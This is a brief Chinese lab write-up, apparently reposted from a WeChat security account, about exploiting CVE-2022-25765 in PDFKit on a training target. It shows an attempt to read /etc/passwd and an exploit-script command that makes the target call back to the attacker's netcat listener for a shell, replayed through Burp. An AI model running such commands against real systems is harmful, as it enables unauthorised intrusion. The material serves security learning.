“ 命令执行”
01
—
CVE-2022-25765
今天打靶机的时候,遇到一个站点,功能是可以把网页转化为PDF的站点,尝试包含/etc/passwd的时候报错了:
根据PDFKit搜索EXP,发现了一个命令执行的EXP
link:https:
//www.exploit-db.com/exploits/51293
python3 CVE
-2022
–
25765.
py -s you_kali_nc_listen
80
-w http:
//192.168.x.x:3000/ -p pdf
将payload进行URL编码,放到BP里面重放攻击,然后kali监听80端口:
突破边界:
原文始发于微信公众号(道玄网安驿站):CVE-2022–25765-PDFKit命令执行
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论